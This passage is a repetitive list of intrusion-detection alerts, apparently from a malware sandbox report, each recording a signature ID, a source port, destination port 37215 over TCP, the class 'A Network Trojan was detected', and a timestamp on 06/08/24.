          SID:2835222
          Source Port:39382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.822723
          SID:2829579
          Source Port:37024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670443
          SID:2835222
          Source Port:55074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274687
          SID:2829579
          Source Port:57696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113945
          SID:2829579
          Source Port:50188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108910
          SID:2835222
          Source Port:34388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465846
          SID:2829579
          Source Port:50992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817391
          SID:2829579
          Source Port:38334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463367
          SID:2835222
          Source Port:37936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264025
          SID:2835222
          Source Port:40144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461016
          SID:2829579
          Source Port:42988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784345
          SID:2835222
          Source Port:54882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820665
          SID:2835222
          Source Port:47990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264087
          SID:2829579
          Source Port:49174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797840
          SID:2829579
          Source Port:33312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107607
          SID:2829579
          Source Port:40218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356471
          SID:2829579
          Source Port:51352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257983
          SID:2829579
          Source Port:46436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601443
          SID:2835222
          Source Port:39662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274758
          SID:2835222
          Source Port:54410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351140
          SID:2829579
          Source Port:34304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165912
          SID:2829579
          Source Port:59648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739778
          SID:2829579
          Source Port:52588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733652
          SID:2835222
          Source Port:34658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731654
          SID:2829579
          Source Port:60730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.796349
          SID:2829579
          Source Port:43864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554622
          SID:2829579
          Source Port:45952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352698
          SID:2835222
          Source Port:36904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.078870
          SID:2835222
          Source Port:47080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353965
          SID:2829579
          Source Port:34788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403181
          SID:2835222
          Source Port:48424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606157
          SID:2835222
          Source Port:33866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860737
          SID:2835222
          Source Port:33246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.069535
          SID:2835222
          Source Port:51850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115177
          SID:2835222
          Source Port:47026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550964
          SID:2829579
          Source Port:52888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740798
          SID:2829579
          Source Port:39938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672314
          SID:2835222
          Source Port:49496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160552
          SID:2829579
          Source Port:33770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.749047
          SID:2829579
          Source Port:46082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240994
          SID:2829579
          Source Port:40060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599667
          SID:2835222
          Source Port:48130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.063054
          SID:2835222
          Source Port:41164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242640
          SID:2829579
          Source Port:46920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912407
          SID:2835222
          Source Port:51548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464800
          SID:2829579
          Source Port:49542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600912
          SID:2835222
          Source Port:43802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016210
          SID:2829579
          Source Port:43204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.797745
          SID:2835222
          Source Port:33812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153802
          SID:2835222
          Source Port:34002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894609
          SID:2829579
          Source Port:41592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668121
          SID:2835222
          Source Port:60648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.068143
          SID:2829579
          Source Port:55322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239821
          SID:2835222
          Source Port:41408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107601
          SID:2829579
          Source Port:45408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799599
          SID:2835222
          Source Port:41132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896721
          SID:2835222
          Source Port:42514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133115
          SID:2835222
          Source Port:44278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548190
          SID:2829579
          Source Port:60702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601271
          SID:2829579
          Source Port:43324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236078
          SID:2835222
          Source Port:45416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188934
          SID:2835222
          Source Port:36064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446490
          SID:2835222
          Source Port:35032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513287
          SID:2829579
          Source Port:56312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514009
          SID:2835222
          Source Port:55978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890768
          SID:2829579
          Source Port:49126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.737050
          SID:2829579
          Source Port:38058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127993
          SID:2835222
          Source Port:60050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734966
          SID:2835222
          Source Port:44240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159323
          SID:2835222
          Source Port:60248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600118
          SID:2829579
          Source Port:53040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446418
          SID:2835222
          Source Port:40924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465779
          SID:2835222
          Source Port:38612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242299
          SID:2829579
          Source Port:39840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600956
          SID:2829579
          Source Port:46956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.517265
          SID:2829579
          Source Port:52372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.748119
          SID:2835222
          Source Port:34770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673886
          SID:2829579
          Source Port:53624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887873
          SID:2835222
          Source Port:35818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787690
          SID:2829579
          Source Port:33710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733904
          SID:2835222
          Source Port:42972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306696
          SID:2829579
          Source Port:39516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099373
          SID:2829579
          Source Port:43710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462436
          SID:2829579
          Source Port:45254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351212
          SID:2835222
          Source Port:37974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704296
          SID:2829579
          Source Port:54844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158108
          SID:2829579
          Source Port:42544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260649
          SID:2829579
          Source Port:34870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517467
          SID:2829579
          Source Port:51540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788808
          SID:2835222
          Source Port:42046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738444
          SID:2835222
          Source Port:32854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888216
          SID:2835222
          Source Port:53530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.735067
          SID:2835222
          Source Port:48126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260654
          SID:2835222
          Source Port:41592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461183
          SID:2835222
          Source Port:50732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240416
          SID:2829579
          Source Port:36718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112555
          SID:2829579
          Source Port:51064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463172
          SID:2829579
          Source Port:40440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405339
          SID:2835222
          Source Port:55834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263866
          SID:2835222
          Source Port:33848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854781
          SID:2829579
          Source Port:55104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113989
          SID:2835222
          Source Port:46160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353107
          SID:2829579
          Source Port:32874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405120
          SID:2835222
          Source Port:56516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744269
          SID:2829579
          Source Port:57836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106447
          SID:2829579
          Source Port:53186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035509
          SID:2835222
          Source Port:60178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508859
          SID:2835222
          Source Port:52424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242530
          SID:2835222
          Source Port:59722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354752
          SID:2835222
          Source Port:53660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466296
          SID:2835222
          Source Port:59604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179558
          SID:2835222
          Source Port:33644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176404
          SID:2829579
          Source Port:47698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005662
          SID:2835222
          Source Port:40596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511624
          SID:2835222
          Source Port:49916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354495
          SID:2829579
          Source Port:49060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468518
          SID:2835222
          Source Port:58056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237424
          SID:2829579
          Source Port:57548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671482
          SID:2835222
          Source Port:40718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465531
          SID:2829579
          Source Port:54326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114634
          SID:2829579
          Source Port:43968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.189193
          SID:2835222
          Source Port:53476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708511
          SID:2829579
          Source Port:33422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471173
          SID:2835222
          Source Port:45864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600487
          SID:2835222
          Source Port:46400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262554
          SID:2829579
          Source Port:47710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.294880
          SID:2829579
          Source Port:49134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.022095
          SID:2835222
          Source Port:57470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404742
          SID:2829579
          Source Port:55888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037043
          SID:2829579
          Source Port:49600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262351
          SID:2829579
          Source Port:52572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.243079
          SID:2835222
          Source Port:52216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.807563
          SID:2829579
          Source Port:48720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.676573
          SID:2829579
          Source Port:58928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741724
          SID:2835222
          Source Port:53840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858488
          SID:2829579
          Source Port:36028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174518
          SID:2835222
          Source Port:42294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.144904
          SID:2829579
          Source Port:59476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811551
          SID:2835222
          Source Port:56928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131924
          SID:2829579
          Source Port:34868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843688
          SID:2829579
          Source Port:50396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276288
          SID:2835222
          Source Port:51982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855435
          SID:2835222
          Source Port:52238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545568
          SID:2829579
          Source Port:42902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352856
          SID:2829579
          Source Port:57240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353386
          SID:2835222
          Source Port:54230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512672
          SID:2829579
          Source Port:51726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108233
          SID:2835222
          Source Port:55980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.834516
          SID:2835222
          Source Port:56444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132673
          SID:2835222
          Source Port:42038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463342
          SID:2835222
          Source Port:54678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668256
          SID:2835222
          Source Port:35268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157461
          SID:2835222
          Source Port:34866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465288
          SID:2835222
          Source Port:35338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516588
          SID:2829579
          Source Port:43362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447162
          SID:2829579
          Source Port:56512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601163
          SID:2829579
          Source Port:60106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160736
          SID:2835222
          Source Port:49886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732515
          SID:2829579
          Source Port:36076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440891
          SID:2835222
          Source Port:38150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860394
          SID:2835222
          Source Port:39618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353466
          SID:2829579
          Source Port:60216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461276
          SID:2829579
          Source Port:52976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806933
          SID:2829579
          Source Port:33272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547319
          SID:2829579
          Source Port:60486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113659
          SID:2829579
          Source Port:53492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044288
          SID:2835222
          Source Port:39478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551952
          SID:2835222
          Source Port:59944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513777
          SID:2835222
          Source Port:58536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912292
          SID:2835222
          Source Port:60394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352624
          SID:2835222
          Source Port:60194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352798
          SID:2835222
          Source Port:33632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240581
          SID:2835222
          Source Port:51714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739917
          SID:2829579
          Source Port:43256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798695
          SID:2835222
          Source Port:46174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352912
          SID:2835222
          Source Port:44604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350660
          SID:2829579
          Source Port:39704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799927
          SID:2829579
          Source Port:40446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897832
          SID:2835222
          Source Port:38944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020459
          SID:2829579
          Source Port:46582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861773
          SID:2829579
          Source Port:46978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129495
          SID:2835222
          Source Port:34018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175935
          SID:2835222
          Source Port:51082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259038
          SID:2829579
          Source Port:41950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514306
          SID:2829579
          Source Port:38476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.025858
          SID:2829579
          Source Port:56422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747597
          SID:2829579
          Source Port:46820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780412
          SID:2835222
          Source Port:55226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131742
          SID:2829579
          Source Port:59184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897813
          SID:2835222
          Source Port:39086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858932
          SID:2835222
          Source Port:40888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602724
          SID:2835222
          Source Port:37802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912668
          SID:2835222
          Source Port:53720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552429
          SID:2829579
          Source Port:60618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355641
          SID:2829579
          Source Port:50830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891352
          SID:2835222
          Source Port:59522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602883
          SID:2835222
          Source Port:50516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673474
          SID:2835222
          Source Port:38616
          Destination Port:37215
